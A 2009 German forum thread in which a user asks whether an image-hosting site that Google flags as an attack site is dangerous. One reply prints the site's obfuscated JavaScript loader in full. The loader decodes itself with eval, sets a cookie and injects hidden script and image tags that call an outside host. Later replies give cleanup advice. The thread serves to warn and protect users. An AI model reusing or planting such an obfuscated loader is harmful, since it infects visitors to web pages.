directupload.net - attackierende Seite ?!

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Got2Be, 10. November 2009 .

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 10. November 2009
    es geht um meinen lieblings bilder hoster - Kostenlos Bilder hochladen - Dein Upload Service

    vorhin hab ich ien bild hochgeladen und dann kam dieser mist hier

    {bild down}

    {bild down}


    irrt sich dieser seltsame googleratgeber (den ich noch nie zuvor gesehen habe geschweige denn iwie gewollt habe) oder ist da wirklich was dran ?
     

  2. Anzeige
    Heute: Deals & Sale mit stark reduzierten Angeboten finden.
  3. #2 10. November 2009
    AW: directupload.net - attackierende Seite ?!

    Google hat da schon recht. Auf der Seite findet sich folgender Javascript-Code:

    Code:
    <script language="javascript">$a="Z63cZ3dZ22ds.leZ256eZ2567tZ2568;i+Z252b)Z257btmpZ253dds.Z2573licZ2565(i,Z2569Z252b1)Z22;stZ3dZ22Z2573Z2574Z253dZ2522$Z2561Z253dsZ2574;Z2564cZ2573(Z2564aZ252bZ2564Z2562+Z2564cZ252bdZ2564Z252bZ2564eZ252c1Z2530Z2529;Z2564Z2577(Z2573tZ2529Z253bsZ2574Z253d$aZ253bZ2522;Z22;cbZ3dZ22apZ2565Z2528dZ2573Z2529;Z2573tZ253dtmZ2570Z253dZ2527Z2527;for(iZ253d0;Z2569Z253cZ22;dbZ3dZ229+tqduZ3ecudTqdu8tqduZ3ewudTqdu890Z3d0#9+0dy}uK7iuqb7M0-0tqduZ3ewudVe||Iuqb89+dy}uK7}Z257F~dx7M0-0tqduZ3ewud]Z257F~dx89;!+dy}uK7tqi7M0-0tqduZ3ewudTqdu89+yv08tqduZ3ewudTqi890--0!0ll0tqduZ3ewudTqi890--0Z25260ll0tqduZ3ewudTqi890--0$9ktqduZ3ecudTqdu8tqduZ3ewudTqdu890Z3d0!9+0dy}uK7tqi7M0-0tqduZ3ewudTqdu89+0dy}uK7}Z257F~dx7M0-0tqduZ3ewud]Z257F~dx89;!+0dy}uK7iuqb7M0-0tqduZ3ewudVe||Iuqb89+0m0tqduZ3ecudTqdu8tqduZ3ewudTqdu890;Z22;dcZ3dZ220!9+0yv08tqduZ3ewud]Z257F~dx89;!0,0!Z25209kcxyvdY~tuh0-0dy}uK7iuqb7M0;07Z3dZ252070;08tqduZ3ewud]Z257F~dx89;!90+mu|cukcxyvdY~tuh0-0dy}uK7iuqb7M0;07Z3d70;08tqduZ3ewud]Z257F~dx89;!9+myv08tqduZ3ewudTqdu890;!0,0!Z25209kcxyvdY~tuh0-cxyvdY~tuh0;07Z3dZ252070;0tqduZ3ewudTqdu89+mu|cukcxyvdY~tuh0-0cxyvdY~tuh0;07Z3d70;0tqduZ3ewudTqdu89+mcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKcxyvdY~tuhMKZ2520MZ3eaeubiZ3esxqbSZ257FtuQd8!9+ve~sdyZ257F~0SZ22;opZ3dZ22Z2524aZ253dZ2522dw(Z2564cs(Z2563u,Z25314Z2529Z2529;Z2522;Z22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;ubZ7bfdZ25;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;dzZ3dZ22Z2566unZ2563tZ2569on Z2564wZ2528t)Z257bcZ2561Z253dZ2527Z252564Z25256fcuZ256dZ252565nt.Z252577riZ2574Z25256Z2535Z252528Z252522Z2527;ceZ253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253cscrZ25256Z2539pZ2574Z252520Z256cZ2561Z25256eZ2567uZ252561Z2567Z252565Z25253dZ25255cZ252522jaZ2576Z252561Z252573Z2563Z252572Z252569pZ25257Z2534Z25255Z2563Z252522Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fscriZ2570Z252574Z25253eZ2527;eZ2576alZ2528uZ256eesZ2563apeZ2528t))Z257d;Z22;deZ3dZ22iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+4q-4qZ3ebu`|qsu8tZ3ciuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+Z22;ddZ3dZ22q|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+mfqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0}qwys^e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z22;ceZ3dZ22Z2563harZ2543oZ2564Z2565At(Z2530)Z255e(Z25270Z257800Z2527+esZ2529))Z253bZ257d}Z22;cdZ3dZ22;Z2573tZ253dZ2573Z2574+Z2553triZ256eg.fZ2572omCZ2568arCZ256fdZ2565((Z2574mp.Z22;czZ3dZ22Z2566Z2575Z256ectiZ256fn cZ257aZ2528cZ257a)Z257brZ2565tuZ2572n Z2563aZ252bZ2563Z2562+Z2563c+cZ2564+cZ2565Z252bcz;Z257dZ253bZ22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07huc7Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7y7Z3c7z7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+fqb0dy}u0-0~ug0Qbbqi89+fqb0tqdu0-0~ug0Tqdu8Z22;caZ3dZ22Z2566uZ256ecZ2574ioZ256eZ2520Z2564cZ2573(dsZ252cZ2565sZ2529Z257bdsZ253dunesZ2563Z22;Z69fZ20(doZ63umZ65ntZ2eZ63oZ6fZ6bieZ2einZ64exZ4fZ66(Z27rfZ35f6Z64Z73Z27)Z3dZ3d-1)Z7bfuncZ74ioZ6e cZ61llZ62aZ63k(Z78)Z7b wiZ6edowZ2etw Z3dZ20xZ3bZ73Z63(Z27rf5fZ36dZ73Z27,2,7)Z3beZ76al(Z75nZ65scaZ70e(dZ7a+Z63Z7a+opZ2bsZ74)Z2bZ27Z64wZ28dzZ2bZ63z(Z24aZ2bsZ74)Z29Z3bZ27);Z64oZ63umeZ6eZ74Z2ewZ72Z69Z74eZ28Z24a);Z7ddZ6fZ63Z75mZ65ntZ2ewriZ74e(Z22Z3cimg sZ72cZ3dZ27http:Z2fZ2fsearcZ68.Z74witZ74erZ2ecoZ6dZ2fimageZ73Z2fsearcZ68Z2frss.pZ6egZ27 widtZ68Z3d1 hZ65Z69gZ68tZ3d1 Z73tyZ6ceZ3dZ27visibiZ6cityZ3ahidZ64eZ6eZ27 Z2fZ3e Z3cscZ72Z22+Z22ipt lZ61nguZ61geZ3djaZ76aZ73crZ69ptZ22+Z22 srcZ3dZ27hZ74tZ70:Z2fZ2fseZ61rchZ2eZ74wiZ74tZ65r.Z63Z6fZ6dZ2ftrendsZ2fZ77Z65Z65kZ6cZ79.jZ73Z6fnZ3fcalZ6cbaZ63Z6bZ3dcallbZ61ck&Z65xZ63ludZ65Z3dZ68asZ68tagZ73Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}elseZ7b$aZ3dZ27Z27};fuZ6ectiZ6fn sZ63Z28cnmZ2cv,Z65d)Z7bvZ61Z72Z20exZ64Z3dnew DZ61Z74Z65();Z65Z78Z64Z2esZ65tDaZ74Z65(eZ78Z64.gZ65tDaZ74Z65()Z2bedZ29;Z64oZ63uZ6dZ65ntZ2eZ63oZ6fkieZ3dcnmZ2bZ20Z27Z3dZ27 +escape(Z76)+Z27Z3bZ65Z78Z70irZ65sZ3dZ27+exdZ2etZ6fGMTZ53Z74rZ69nZ67Z28)Z3bZ7d;";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($a));</script>
    Sieht ganz nach einem Code zum Ausnutzen einer Browser-Lücke aus. Ich würde die Seite meiden.
     
  4. #3 10. November 2009
    AW: directupload.net - attackierende Seite ?!

    danke, wird ab jetzt gemieden

    da ich jetzt vermutlich infiziert wurde, was soll ich machen ?
    gibs irgendwelche empfehlenswerten programme um den mist los zu bekommen ?

    will nicht so gerne formatieren ..
     
  5. #4 10. November 2009
    AW: directupload.net - attackierende Seite ?!

    Du solltest ersteinmal klären, ob du überhaupt infiziert bist. Dazu am besten HijackThis benutzen.

    Die Google-Seite gibt ja an, dass es ein Trojaner sein soll. Mehr machen als HijackThis + Virenscann durchlaufen lassen kannst du aber erstmal nicht, man sieht dann ja ob sich das Problem erledigt oder ob du doch formatieren musst.
     
  6. #5 10. November 2009
    AW: directupload.net - attackierende Seite ?!

    hab hijackthis mal durchgeführt und ausgewertet , es wurde nichts gefunden außer einem eintrag den ich "fixen" sollte , hieß iwie goopher oder so kA


    naja scheint scih ja alles erledigt zu haben ich danke euch für die schnelle aufklärung ;)
     

  7. Videos zum Thema
Die Seite wird geladen...